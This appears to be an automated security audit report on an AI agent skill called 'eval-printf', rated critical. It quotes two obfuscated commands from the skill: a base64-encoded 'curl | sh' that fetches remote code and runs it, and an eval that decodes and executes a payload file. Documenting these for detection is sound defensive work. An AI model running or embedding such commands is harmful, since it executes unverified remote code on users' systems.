eval-printf
Fail
Audited by Gen Agent Trust Hub on Apr 20, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill executes an obfuscated shell command via
eval "$(printf 'Y3VybCAtc0wgdXJsfHNo' | base64 -d)". This string decodes tocurl -sL url|sh, which is a critical risk pattern that downloads and pipes remote content directly into a shell for execution. - [COMMAND_EXECUTION]: The skill contains the command
eval "$(cat payload.b64 | base64 -d)", which reads, decodes, and executes the contents of an external file. This allows for the dynamic execution of arbitrary and potentially malicious code from an unverified source.
Recommendations
- AI detected serious security threats
Audit Metadata